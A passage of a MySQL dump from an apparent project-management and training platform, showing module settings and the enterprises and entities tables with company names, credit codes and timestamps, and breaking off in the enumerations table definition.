sks'),(1435,144,'issue_tracking'),(1436,144,'news'),(1437,144,'files'),(1438,144,'wiki'),(1439,144,'repository'),(1440,144,'boards'),(1441,144,'calendar'),(1442,144,'gantt'),(1443,144,'course'),(1444,144,'training_tasks'),(1555,156,'issue_tracking'),(1556,156,'news'),(1557,156,'files'),(1558,156,'wiki'),(1559,156,'repository'),(1560,156,'boards'),(1561,156,'calendar'),(1562,156,'gantt'),(1563,156,'course'),(1564,156,'training_tasks'),(1565,157,'issue_tracking'),(1566,157,'news'),(1567,157,'files'),(1568,157,'wiki'),(1569,157,'repository'),(1570,157,'boards'),(1571,157,'calendar'),(1572,157,'gantt'),(1573,157,'course'),(1574,157,'training_tasks'),(1575,158,'issue_tracking'),(1576,158,'news'),(1577,158,'files'),(1578,158,'wiki'),(1579,158,'repository'),(1580,158,'boards'),(1581,158,'calendar'),(1582,158,'gantt'),(1583,158,'course'),(1584,158,'training_tasks'),(1585,159,'issue_tracking'),(1586,159,'news'),(1587,159,'files'),(1588,159,'wiki'),(1589,159,'repository'),(1590,159,'boards'),(1591,159,'calendar'),(1592,159,'gantt'),(1593,159,'course'),(1594,159,'training_tasks'),(1605,161,'issue_tracking'),(1606,161,'news'),(1607,161,'files'),(1608,161,'wiki'),(1609,161,'repository'),(1610,161,'boards'),(1611,161,'calendar'),(1612,161,'gantt'),(1613,161,'course'),(1614,161,'training_tasks'),(1686,169,'issue_tracking'),(1687,169,'news'),(1688,169,'files'),(1689,169,'wiki'),(1690,169,'repository'),(1691,169,'boards'),(1692,169,'calendar'),(1693,169,'gantt'),(1694,169,'course'),(1695,169,'training_tasks'),(1776,178,'issue_tracking'),(1777,178,'news'),(1778,178,'files'),(1779,178,'wiki'),(1780,178,'repository'),(1781,178,'boards'),(1782,178,'calendar'),(1783,178,'gantt'),(1784,178,'course'),(1785,178,'training_tasks'),(1996,199,'repository'),(1997,199,'boards'),(1998,199,'calendar'),(1999,199,'gantt'),(2002,200,'issue_tracking'),(2003,200,'news'),(2004,200,'files'),(2005,200,'wiki'),(2006,200,'repository'),(2007,200,'boards'),(2008,200,'calendar'),(2009,200,'gantt'),(2010,200,'course'),(2011,200,'training_tasks'),(2032,203,'issue_tracking'),(2033,203,'news'),(2034,203,'files'),(2035,203,'wiki'),(2036,203,'repository'),(2037,203,'boards'),(2038,203,'calendar'),(2039,203,'gantt'),(2040,203,'course'),(2041,203,'training_tasks'),(2042,204,'issue_tracking'),(2043,204,'news'),(2044,204,'files'),(2045,204,'wiki'),(2046,204,'repository'),(2047,204,'boards'),(2048,204,'calendar'),(2049,204,'gantt'),(2050,204,'course'),(2051,204,'training_tasks'),(2052,205,'issue_tracking'),(2053,205,'news'),(2054,205,'files'),(2055,205,'wiki'),(2056,205,'repository'),(2057,205,'boards'),(2058,205,'calendar'),(2059,205,'gantt'),(2060,205,'course'),(2061,205,'training_tasks'),(2172,217,'issue_tracking'),(2173,217,'news'),(2174,217,'files'),(2175,217,'wiki'),(2176,217,'repository'),(2177,217,'boards'),(2178,217,'calendar'),(2179,217,'gantt'),(2180,217,'course'),(2181,217,'training_tasks'),(2192,219,'issue_tracking'),(2193,219,'news'),(2194,219,'files'),(2195,219,'wiki'),(2196,219,'repository'),(2197,219,'boards'),(2198,219,'calendar'),(2199,219,'gantt'),(2200,219,'course'),(2201,219,'training_tasks'),(2212,221,'issue_tracking'),(2213,221,'news'),(2214,221,'files'),(2215,221,'wiki'),(2216,221,'repository'),(2217,221,'boards'),(2218,221,'calendar'),(2219,221,'gantt'),(2220,221,'course'),(2221,221,'training_tasks'),(2232,223,'issue_tracking'),(2233,223,'news'),(2234,223,'files'),(2235,223,'wiki'),(2236,223,'repository'),(2237,223,'boards'),(2238,223,'calendar'),(2239,223,'gantt'),(2240,223,'course'),(2241,223,'training_tasks'),(2242,224,'issue_tracking'),(2243,224,'news'),(2244,224,'files'),(2245,224,'wiki'),(2246,224,'repository'),(2247,224,'boards'),(2248,224,'calendar'),(2249,224,'gantt'),(2250,224,'course'),(2251,224,'training_tasks'),(2252,225,'issue_tracking'),(2253,225,'news'),(2254,225,'files'),(2255,225,'wiki'),(2256,225,'repository'),(2257,225,'boards'),(2258,225,'calendar'),(2259,225,'gantt'),(2260,225,'course'),(2261,225,'training_tasks'),(2262,226,'issue_tracking'),(2263,226,'news'),(2264,226,'files'),(2265,226,'wiki'),(2266,226,'repository'),(2267,226,'boards'),(2268,226,'calendar'),(2269,226,'gantt'),(2270,226,'course'),(2271,226,'training_tasks'),(2282,228,'issue_tracking'),(2283,228,'news'),(2284,228,'files'),(2285,228,'wiki'),(2286,228,'repository'),(2287,228,'boards'),(2288,228,'calendar'),(2289,228,'gantt'),(2290,228,'course'),(2291,228,'training_tasks'),(2302,230,'issue_tracking'),(2303,230,'news'),(2304,230,'files'),(2305,230,'wiki'),(2306,230,'repository'),(2307,230,'boards'),(2308,230,'calendar'),(2309,230,'gantt'),(2310,230,'course'),(2311,230,'training_tasks'),(2312,231,'issue_tracking'),(2313,231,'news'),(2314,231,'files'),(2315,231,'wiki'),(2316,231,'repository'),(2317,231,'boards'),(2318,231,'calendar'),(2319,231,'gantt'),(2320,231,'course'),(2321,231,'training_tasks'),(2322,232,'issue_tracking'),(2323,232,'news'),(2324,232,'files'),(2325,232,'wiki'),(2326,232,'repository'),(2327,232,'boards'),(2328,232,'calendar'),(2329,232,'gantt'),(2330,232,'course'),(2331,232,'training_tasks'),(2332,233,'issue_tracking'),(2333,233,'news'),(2334,233,'files'),(2335,233,'wiki'),(2336,233,'repository'),(2337,233,'boards'),(2338,233,'calendar'),(2339,233,'gantt'),(2340,233,'course'),(2341,233,'training_tasks'),(2482,248,'issue_tracking'),(2483,248,'news'),(2484,248,'files'),(2485,248,'wiki'),(2486,248,'repository'),(2487,248,'boards'),(2488,248,'calendar'),(2489,248,'gantt'),(2490,248,'course'),(2491,248,'training_tasks'),(2492,199,'issue_tracking'),(2503,250,'issue_tracking'),(2504,250,'news'),(2505,250,'files'),(2506,250,'wiki'),(2507,250,'repository'),(2508,250,'boards'),(2509,250,'calendar'),(2510,250,'gantt'),(2511,250,'course'),(2512,250,'training_tasks'),(2513,251,'issue_tracking'),(2514,251,'news'),(2515,251,'files'),(2516,251,'wiki'),(2517,251,'repository'),(2518,251,'boards'),(2519,251,'calendar'),(2520,251,'gantt'),(2521,251,'course'),(2522,251,'training_tasks'),(2523,252,'issue_tracking'),(2524,252,'news'),(2525,252,'files'),(2526,252,'wiki'),(2527,252,'repository'),(2528,252,'boards'),(2529,252,'calendar'),(2530,252,'gantt'),(2531,252,'course'),(2532,252,'training_tasks'),(2533,253,'issue_tracking'),(2534,253,'news'),(2535,253,'files'),(2536,253,'wiki'),(2537,253,'repository'),(2538,253,'boards'),(2539,253,'calendar'),(2540,253,'gantt'),(2541,253,'course'),(2542,253,'training_tasks'),(2543,254,'issue_tracking'),(2544,254,'news'),(2545,254,'files'),(2546,254,'wiki'),(2547,254,'repository'),(2548,254,'boards'),(2549,254,'calendar'),(2550,254,'gantt'),(2551,254,'course'),(2552,254,'training_tasks'),(2553,255,'issue_tracking'),(2554,255,'news'),(2555,255,'files'),(2556,255,'wiki'),(2557,255,'repository'),(2558,255,'boards'),(2559,255,'calendar'),(2560,255,'gantt'),(2561,255,'course'),(2562,255,'training_tasks'),(2563,256,'issue_tracking'),(2564,256,'news'),(2565,256,'files'),(2566,256,'wiki'),(2567,256,'repository'),(2568,256,'boards'),(2569,256,'calendar'),(2570,256,'gantt'),(2571,256,'course'),(2572,256,'training_tasks'),(2573,257,'issue_tracking'),(2574,257,'news'),(2575,257,'files'),(2576,257,'wiki'),(2577,257,'repository'),(2578,257,'boards'),(2579,257,'calendar'),(2580,257,'gantt'),(2581,257,'course'),(2582,257,'training_tasks'),(2583,258,'issue_tracking'),(2584,258,'news'),(2585,258,'files'),(2586,258,'wiki'),(2587,258,'repository'),(2588,258,'boards'),(2589,258,'calendar'),(2590,258,'gantt'),(2591,258,'course'),(2592,258,'training_tasks'),(2593,259,'issue_tracking'),(2594,259,'news'),(2595,259,'files'),(2596,259,'wiki'),(2597,259,'repository'),(2598,259,'boards'),(2599,259,'calendar'),(2600,259,'gantt'),(2601,259,'course'),(2602,259,'training_tasks'),(2613,261,'issue_tracking'),(2614,261,'news'),(2615,261,'files'),(2616,261,'wiki'),(2617,261,'repository'),(2618,261,'boards'),(2619,261,'calendar'),(2620,261,'gantt'),(2621,261,'course'),(2622,261,'training_tasks'),(2623,262,'issue_tracking'),(2624,262,'news'),(2625,262,'files'),(2626,262,'wiki'),(2627,262,'repository'),(2628,262,'boards'),(2629,262,'calendar'),(2630,262,'gantt'),(2631,262,'course'),(2632,262,'training_tasks'),(2633,263,'issue_tracking'),(2634,263,'news'),(2635,263,'files'),(2636,263,'wiki'),(2637,263,'repository'),(2638,263,'boards'),(2639,263,'calendar'),(2640,263,'gantt'),(2641,263,'course'),(2642,263,'training_tasks'),(2643,264,'issue_tracking'),(2644,264,'news'),(2645,264,'files'),(2646,264,'wiki'),(2647,264,'repository'),(2648,264,'boards'),(2649,264,'calendar'),(2650,264,'gantt'),(2651,264,'course'),(2652,264,'training_tasks'),(2653,265,'issue_tracking'),(2654,265,'news'),(2655,265,'files'),(2656,265,'wiki'),(2657,265,'repository'),(2658,265,'boards'),(2659,265,'calendar'),(2660,265,'gantt'),(2661,265,'course'),(2662,265,'training_tasks'),(2663,266,'issue_tracking'),(2664,266,'news'),(2665,266,'files'),(2666,266,'wiki'),(2667,266,'repository'),(2668,266,'boards'),(2669,266,'calendar'),(2670,266,'gantt'),(2671,266,'course'),(2672,266,'training_tasks'),(2673,267,'issue_tracking'),(2674,267,'news'),(2675,267,'files'),(2676,267,'wiki'),(2677,267,'repository'),(2678,267,'boards'),(2679,267,'calendar'),(2680,267,'gantt'),(2681,267,'course'),(2682,267,'training_tasks'),(2683,268,'issue_tracking'),(2684,268,'news'),(2685,268,'files'),(2686,268,'wiki'),(2687,268,'repository'),(2688,268,'boards'),(2689,268,'calendar'),(2690,268,'gantt'),(2691,268,'course'),(2692,268,'training_tasks'),(2693,269,'issue_tracking'),(2694,269,'news'),(2695,269,'files'),(2696,269,'wiki'),(2697,269,'repository'),(2698,269,'boards'),(2699,269,'calendar'),(2700,269,'gantt'),(2701,269,'course'),(2702,269,'training_tasks'),(2703,270,'issue_tracking'),(2704,270,'news'),(2705,270,'files'),(2706,270,'wiki'),(2707,270,'repository'),(2708,270,'boards'),(2709,270,'calendar'),(2710,270,'gantt'),(2711,270,'course'),(2712,270,'training_tasks'),(2713,271,'issue_tracking'),(2714,271,'news'),(2715,271,'files'),(2716,271,'wiki'),(2717,271,'repository'),(2718,271,'boards'),(2719,271,'calendar'),(2720,271,'gantt'),(2721,271,'course'),(2722,271,'training_tasks'),(2723,272,'issue_tracking'),(2724,272,'news'),(2725,272,'files'),(2726,272,'wiki'),(2727,272,'repository'),(2728,272,'boards'),(2729,272,'calendar'),(2730,272,'gantt'),(2731,272,'course'),(2732,272,'training_tasks'),(2733,273,'issue_tracking'),(2734,273,'news'),(2735,273,'files'),(2736,273,'wiki'),(2737,273,'repository'),(2738,273,'boards'),(2739,273,'calendar'),(2740,273,'gantt'),(2741,273,'course'),(2742,273,'training_tasks'),(2743,274,'issue_tracking'),(2744,274,'news'),(2745,274,'files'),(2746,274,'wiki'),(2747,274,'repository'),(2748,274,'boards'),(2749,274,'calendar'),(2750,274,'gantt'),(2751,274,'course'),(2752,274,'training_tasks'),(2753,275,'issue_tracking'),(2754,275,'news'),(2755,275,'files'),(2756,275,'wiki'),(2757,275,'repository'),(2758,275,'boards'),(2759,275,'calendar'),(2760,275,'gantt'),(2761,275,'course'),(2762,275,'training_tasks');
|
||
/*!40000 ALTER TABLE `enabled_modules` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `enterprises`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `enterprises`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `enterprises` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) NOT NULL,
|
||
`credit_code` varchar(255) NOT NULL,
|
||
`scale` varchar(255) DEFAULT NULL,
|
||
`entity_id` int(11) DEFAULT NULL,
|
||
`industry_id` int(11) DEFAULT NULL,
|
||
`placement_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`is_check` tinyint(1) DEFAULT '0',
|
||
`type_cd` int(11) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
UNIQUE KEY `index_enterprises_on_credit_code` (`credit_code`),
|
||
KEY `index_enterprises_on_scale` (`scale`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=26 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `enterprises`
|
||
--
|
||
|
||
LOCK TABLES `enterprises` WRITE;
|
||
/*!40000 ALTER TABLE `enterprises` DISABLE KEYS */;
|
||
INSERT INTO `enterprises` VALUES (1,'创客管理中心','G1062010201026550W','1',1,1,1,'2019-08-06 08:38:48','2019-08-06 08:38:48',0,0),(2,'创新院人工智能中心','123456789123456789','1',3,1,1,'2019-08-07 09:35:21','2019-11-01 11:07:40',0,1),(3,'NUPT','182NT28934TT88XX76','5',6,2,1,'2019-08-07 15:51:47','2019-08-07 15:51:47',0,0),(4,'上海崇明技术有限公司','G10530111022561305','2',7,1,1,'2019-08-13 10:50:27','2019-08-13 10:50:27',0,0),(12,'北京运用公司','G10360313000505406','4',4,2,1,'2019-08-26 09:51:23','2020-10-15 08:35:37',0,0),(14,'nudt','000111000111000111','5',10,1,1,'2019-09-16 10:14:46','2019-09-16 10:14:46',0,0),(15,'北京云顶科技有限公司','123456789123456786','1',16,1,1,'2019-10-29 17:13:49','2019-10-29 17:13:49',0,0),(17,'唐艺','123456788765432112','2',19,2,1,'2019-11-01 15:39:59','2019-11-01 15:39:59',0,0),(18,'人工智能中心','111111222222333333','2',26,1,1,'2019-11-05 15:35:11','2019-11-05 15:35:46',0,1),(20,'水电费','123456789123456780','1',28,2,1,'2019-11-25 12:51:01','2019-11-25 12:51:01',0,0),(22,'北京老周有限公司','191919191919919191','3',86,2,1,'2020-12-27 11:46:48','2020-12-27 11:46:48',0,0),(23,'南京港图软件有限公司','91320106679021456B','1',127,1,1,'2021-02-20 11:07:23','2021-02-20 11:07:23',0,0),(24,'aaa','123456789987654321','1',137,1,1,'2021-02-25 08:49:33','2021-02-25 08:49:33',0,0),(25,'青岛数智船海科技有限公司','91370211MA3EP51P6W','2',157,2,1,'2021-03-05 13:13:54','2021-03-05 13:13:54',0,0);
|
||
/*!40000 ALTER TABLE `enterprises` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `entities`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `entities`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `entities` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`entity_type` int(11) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`apply_user_authentication_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_entities_on_entity_type` (`entity_type`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=176 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `entities`
|
||
--
|
||
|
||
LOCK TABLES `entities` WRITE;
|
||
/*!40000 ALTER TABLE `entities` DISABLE KEYS */;
|
||
INSERT INTO `entities` VALUES (1,1,46,'2019-08-06 08:38:48','2019-08-06 08:38:48',NULL),(2,2,47,'2019-08-06 09:54:43','2019-08-06 09:54:43',NULL),(3,1,49,'2019-08-07 09:35:21','2019-10-31 14:43:49',2),(4,1,50,'2019-08-07 14:57:03','2019-08-26 09:42:23',NULL),(5,2,51,'2019-08-07 14:59:25','2019-08-07 14:59:25',NULL),(6,1,52,'2019-08-07 15:51:47','2019-08-07 15:51:47',NULL),(7,1,53,'2019-08-13 10:50:27','2019-08-13 10:50:27',NULL),(10,1,55,'2019-09-16 10:02:02','2019-09-16 10:14:46',NULL),(11,2,56,'2019-09-16 10:31:28','2019-09-16 10:31:28',NULL),(12,2,57,'2019-10-10 16:48:10','2019-10-10 16:48:10',NULL),(13,2,58,'2019-10-19 09:24:20','2019-10-19 09:24:20',NULL),(15,2,60,'2019-10-29 10:00:26','2019-10-29 10:00:26',NULL),(16,1,61,'2019-10-29 17:07:24','2019-10-29 17:13:49',1),(17,1,62,'2019-10-29 17:08:25','2019-10-29 17:08:25',NULL),(18,2,63,'2019-10-31 18:37:10','2019-11-01 16:20:18',NULL),(19,1,64,'2019-10-31 18:37:10','2019-11-01 15:39:59',3),(20,2,65,'2019-10-31 18:37:10','2019-11-01 15:57:08',NULL),(21,2,66,'2019-10-31 18:37:10','2019-11-01 16:20:49',NULL),(22,1,67,'2019-10-31 18:37:11','2019-10-31 18:37:11',NULL),(23,1,68,'2019-10-31 18:37:11','2019-10-31 18:37:11',NULL),(24,1,69,'2019-10-31 18:37:11','2019-10-31 18:37:11',NULL),(25,1,70,'2019-10-31 18:37:11','2019-10-31 18:37:11',NULL),(26,1,71,'2019-10-31 18:37:11','2019-11-05 15:35:46',4),(28,1,73,'2019-11-25 11:25:31','2019-11-25 12:52:09',NULL),(29,2,74,'2020-02-01 12:47:12','2020-02-01 12:47:12',NULL),(30,2,75,'2020-02-01 18:52:39','2020-02-01 18:52:39',NULL),(31,2,76,'2020-02-01 20:34:46','2020-02-01 20:34:46',NULL),(32,2,77,'2020-02-01 22:26:36','2020-02-01 22:26:36',NULL),(33,2,78,'2020-02-03 17:19:19','2020-02-03 17:19:19',NULL),(34,2,79,'2020-02-04 22:00:19','2020-02-04 22:00:19',NULL),(35,2,80,'2020-02-04 22:09:45','2020-02-04 22:09:45',NULL),(36,2,81,'2020-02-05 10:29:30','2020-02-05 10:29:30',NULL),(37,2,82,'2020-02-05 10:30:48','2020-02-05 10:30:48',NULL),(38,2,83,'2020-02-05 10:31:59','2020-02-05 10:31:59',NULL),(39,2,84,'2020-02-05 10:33:10','2020-02-05 10:33:10',NULL),(40,2,85,'2020-02-05 10:35:26','2020-02-05 10:35:26',NULL),(41,2,86,'2020-02-05 10:38:36','2020-02-05 10:38:36',NULL),(42,2,87,'2020-02-05 10:39:59','2020-02-05 10:39:59',NULL),(43,2,88,'2020-02-05 10:43:18','2020-02-05 10:43:18',NULL),(44,2,89,'2020-02-05 10:54:45','2020-02-05 10:54:45',NULL),(45,2,90,'2020-02-05 10:54:48','2020-02-05 10:54:48',NULL),(46,2,91,'2020-02-05 10:55:15','2020-02-05 10:55:15',NULL),(47,1,92,'2020-02-05 10:56:00','2020-02-05 10:56:00',NULL),(48,2,93,'2020-02-05 10:58:38','2020-02-05 10:58:38',NULL),(49,2,94,'2020-02-05 11:02:30','2020-02-05 11:02:30',NULL),(50,2,95,'2020-02-05 11:05:02','2020-02-05 11:05:02',NULL),(51,2,96,'2020-02-05 11:24:55','2020-02-05 11:24:55',NULL),(52,2,97,'2020-02-05 11:41:14','2020-02-05 11:41:14',NULL),(53,2,98,'2020-02-05 12:24:57','2020-02-05 12:24:57',NULL),(54,2,99,'2020-02-05 14:48:32','2020-02-05 14:48:32',NULL),(55,2,100,'2020-02-05 14:53:15','2020-02-05 14:53:15',NULL),(56,2,101,'2020-02-05 15:22:57','2020-02-05 15:22:57',NULL),(57,2,102,'2020-02-05 16:25:27','2020-02-05 16:25:27',NULL),(58,2,103,'2020-02-10 12:21:33','2020-02-10 12:21:33',NULL),(59,2,104,'2020-03-19 13:54:38','2020-03-19 13:54:38',NULL),(60,2,105,'2020-03-19 15:08:51','2020-03-19 15:08:51',NULL),(61,2,106,'2020-03-19 15:09:00','2020-03-19 15:09:00',NULL),(62,2,107,'2020-03-19 15:10:11','2020-03-19 15:10:11',NULL),(63,2,108,'2020-03-19 15:12:55','2020-03-19 15:12:55',NULL),(64,2,109,'2020-03-19 15:13:24','2020-03-19 15:13:24',NULL),(65,2,110,'2020-03-23 08:27:59','2020-03-23 08:27:59',NULL),(66,2,1,'2020-03-24 08:23:08','2020-03-24 08:23:08',NULL),(67,2,45,'2020-03-27 19:21:15','2020-03-27 19:21:15',NULL),(68,2,111,'2020-07-03 11:51:05','2020-07-03 11:51:05',NULL),(69,2,112,'2020-08-12 10:41:20','2020-08-12 10:41:20',NULL),(70,2,114,'2020-08-14 08:58:42','2020-08-14 08:58:42',NULL),(71,2,116,'2020-09-29 17:20:40','2020-09-29 17:20:40',NULL),(72,2,48,'2020-10-14 17:50:23','2020-10-14 18:15:48',NULL),(73,2,115,'2020-10-15 10:34:25','2020-10-15 10:34:25',NULL),(74,1,117,'2020-10-21 16:47:58','2020-10-21 16:47:58',NULL),(75,2,118,'2020-12-01 18:18:16','2020-12-01 18:18:16',NULL),(76,2,119,'2020-12-02 13:18:32','2020-12-02 13:18:32',NULL),(77,2,120,'2020-12-14 14:31:53','2020-12-14 14:31:53',NULL),(78,2,121,'2020-12-16 16:06:31','2020-12-16 16:06:31',NULL),(79,2,122,'2020-12-16 18:54:54','2020-12-16 18:54:54',NULL),(80,2,123,'2020-12-17 10:03:56','2020-12-17 10:03:56',NULL),(81,2,124,'2020-12-17 11:17:58','2020-12-17 11:17:58',NULL),(82,2,125,'2020-12-17 11:22:00','2020-12-17 11:22:00',NULL),(83,2,126,'2020-12-18 18:53:33','2020-12-18 18:53:33',NULL),(84,2,127,'2020-12-22 19:48:05','2020-12-22 19:48:05',NULL),(85,2,128,'2020-12-24 15:19:18','2020-12-24 15:19:18',NULL),(86,1,129,'2020-12-27 11:43:54','2020-12-27 11:46:48',7),(87,2,130,'2020-12-28 11:28:50','2020-12-28 11:28:50',NULL),(88,2,131,'2020-12-29 11:32:47','2020-12-29 11:32:47',NULL),(89,2,132,'2020-12-29 15:12:24','2020-12-29 15:12:24',NULL),(90,2,133,'2020-12-29 15:21:31','2020-12-29 15:21:31',NULL),(91,2,134,'2020-12-29 15:24:04','2020-12-29 15:24:04',NULL),(92,2,135,'2020-12-30 10:05:30','2020-12-30 10:05:30',NULL),(93,2,136,'2021-01-05 10:33:26','2021-01-05 10:33:26',NULL),(94,2,137,'2021-01-05 18:41:43','2021-01-05 18:41:43',NULL),(95,2,138,'2021-01-06 10:52:46','2021-01-06 10:52:46',NULL),(96,2,139,'2021-01-06 11:04:59','2021-01-06 11:04:59',NULL),(97,2,140,'2021-01-06 11:12:28','2021-01-06 11:12:28',NULL),(98,2,141,'2021-01-06 11:21:36','2021-01-06 11:21:36',NULL),(99,2,142,'2021-01-06 11:29:06','2021-01-06 11:29:06',NULL),(100,2,143,'2021-01-06 11:39:56','2021-01-06 11:39:56',NULL),(101,2,144,'2021-01-06 11:47:58','2021-01-06 11:47:58',NULL),(102,2,145,'2021-01-06 14:02:22','2021-01-06 14:02:22',NULL),(103,2,147,'2021-01-06 14:44:32','2021-01-06 14:44:32',NULL),(104,2,148,'2021-01-06 14:55:48','2021-01-06 14:55:48',NULL),(105,2,149,'2021-01-06 15:44:03','2021-01-06 15:44:03',NULL),(106,2,150,'2021-01-06 15:49:27','2021-01-06 15:49:27',NULL),(107,2,151,'2021-01-06 16:24:56','2021-01-06 16:24:56',NULL),(108,2,152,'2021-01-07 15:22:45','2021-01-07 15:22:45',NULL),(109,2,153,'2021-01-13 11:04:29','2021-01-13 11:04:29',NULL),(110,2,155,'2021-01-22 15:35:26','2021-01-22 15:35:26',NULL),(111,2,156,'2021-01-26 09:20:08','2021-01-26 09:20:08',NULL),(112,2,157,'2021-01-26 18:22:00','2021-01-26 18:22:00',NULL),(113,2,158,'2021-01-28 15:58:35','2021-01-28 15:58:35',NULL),(114,2,159,'2021-01-28 18:25:28','2021-01-28 18:25:28',NULL),(115,2,160,'2021-01-28 23:13:23','2021-01-28 23:13:23',NULL),(116,2,161,'2021-02-20 09:25:51','2021-02-20 09:25:51',NULL),(117,2,162,'2021-02-20 09:26:03','2021-02-20 09:26:03',NULL),(118,2,163,'2021-02-20 09:32:12','2021-02-20 09:32:12',NULL),(119,2,164,'2021-02-20 09:37:18','2021-02-20 09:37:18',NULL),(120,2,165,'2021-02-20 09:43:56','2021-02-20 09:43:56',NULL),(121,2,166,'2021-02-20 09:44:37','2021-02-20 09:44:37',NULL),(122,2,167,'2021-02-20 09:48:11','2021-02-20 09:48:11',NULL),(123,2,168,'2021-02-20 09:58:40','2021-02-20 09:58:40',NULL),(124,2,169,'2021-02-20 10:13:42','2021-02-20 10:13:42',NULL),(125,2,170,'2021-02-20 10:34:59','2021-02-20 10:34:59',NULL),(126,2,171,'2021-02-20 10:41:53','2021-02-20 10:41:53',NULL),(127,1,172,'2021-02-20 11:02:05','2021-02-20 11:09:40',8),(128,2,173,'2021-02-20 13:26:03','2021-02-20 13:26:03',NULL),(129,2,174,'2021-02-20 14:13:03','2021-02-20 14:13:03',NULL),(130,2,175,'2021-02-20 14:22:16','2021-02-20 14:22:16',NULL),(131,2,176,'2021-02-20 19:46:56','2021-02-20 19:46:56',NULL),(132,2,177,'2021-02-21 14:02:23','2021-02-21 14:02:23',NULL),(133,2,178,'2021-02-22 22:37:00','2021-02-22 22:37:00',NULL),(134,2,179,'2021-02-24 14:52:39','2021-02-24 14:52:39',NULL),(135,2,180,'2021-02-24 17:51:46','2021-02-24 17:51:46',NULL),(136,2,181,'2021-02-25 08:42:05','2021-02-25 08:42:05',NULL),(137,1,182,'2021-02-25 08:49:07','2021-02-25 08:49:35',9),(138,2,183,'2021-02-25 14:01:01','2021-02-25 14:01:01',NULL),(139,2,184,'2021-02-26 10:24:40','2021-02-26 10:24:40',NULL),(140,2,185,'2021-02-26 20:15:44','2021-02-26 20:15:44',NULL),(141,2,186,'2021-03-01 19:03:56','2021-03-01 19:03:56',NULL),(142,2,187,'2021-03-01 22:07:13','2021-03-01 22:07:13',NULL),(143,2,189,'2021-03-03 07:35:42','2021-03-03 07:35:42',NULL),(144,2,190,'2021-03-04 10:12:27','2021-03-04 10:12:27',NULL),(145,2,191,'2021-03-04 10:16:31','2021-03-04 10:16:31',NULL),(146,2,192,'2021-03-04 10:17:21','2021-03-04 10:17:21',NULL),(147,2,193,'2021-03-04 10:19:53','2021-03-04 10:19:53',NULL),(148,2,194,'2021-03-04 10:19:59','2021-03-04 10:19:59',NULL),(149,2,195,'2021-03-04 10:20:06','2021-03-04 10:20:06',NULL),(150,2,196,'2021-03-04 10:27:32','2021-03-04 10:27:32',NULL),(151,2,197,'2021-03-04 10:28:07','2021-03-04 10:28:07',NULL),(152,2,198,'2021-03-04 10:29:41','2021-03-04 10:29:41',NULL),(153,2,199,'2021-03-04 10:42:07','2021-03-04 10:42:07',NULL),(154,2,200,'2021-03-04 11:10:46','2021-03-04 11:10:46',NULL),(155,2,201,'2021-03-05 10:32:57','2021-03-05 10:32:57',NULL),(156,2,202,'2021-03-05 11:23:45','2021-03-05 11:23:45',NULL),(157,1,203,'2021-03-05 13:12:22','2021-03-05 13:13:54',10),(158,2,204,'2021-03-05 14:19:55','2021-03-05 14:19:55',NULL),(159,2,205,'2021-03-05 14:37:57','2021-03-05 14:37:57',NULL),(160,2,206,'2021-03-05 22:04:34','2021-03-05 22:04:34',NULL),(161,2,207,'2021-03-06 17:19:19','2021-03-06 17:19:19',NULL),(162,2,208,'2021-03-06 17:26:16','2021-03-06 17:26:16',NULL),(163,2,209,'2021-03-06 18:04:36','2021-03-06 18:04:36',NULL),(164,2,210,'2021-03-06 19:56:38','2021-03-06 19:56:38',NULL),(165,2,211,'2021-03-07 23:20:59','2021-03-07 23:20:59',NULL),(166,2,212,'2021-03-09 16:01:16','2021-03-09 16:01:16',NULL),(167,2,213,'2021-03-09 16:20:16','2021-03-09 16:20:16',NULL),(168,2,214,'2021-03-09 16:43:12','2021-03-09 16:43:12',NULL),(169,2,215,'2021-03-09 21:49:19','2021-03-09 21:49:19',NULL),(170,2,216,'2021-03-10 18:03:19','2021-03-10 18:03:19',NULL),(171,2,217,'2021-03-11 07:02:07','2021-03-11 07:02:07',NULL),(172,2,218,'2021-03-11 15:05:29','2021-03-11 15:05:29',NULL),(173,2,219,'2021-03-12 20:36:44','2021-03-12 20:36:44',NULL),(174,2,220,'2021-03-13 11:50:02','2021-03-13 11:50:02',NULL),(175,2,221,'2021-03-13 14:46:34','2021-03-13 14:46:34',NULL);
|
||
/*!40000 ALTER TABLE `entities` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `enumerations`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `enumerations`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `enumerations` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(30) NOT NULL DEFAULT '',
|
||
`position` int(11) DEFAULT '1',
|
||
`is_default` tinyint(1) NOT NULL DEFAULT '0',
|
||
`type` varchar(255) DEFAULT NULL,
|
||
`active` tinyint(1) NOT NULL DEFAULT '1',
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`parent_id` int(11) DEFAULT NULL,
|
||
`position_name` varchar(30) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
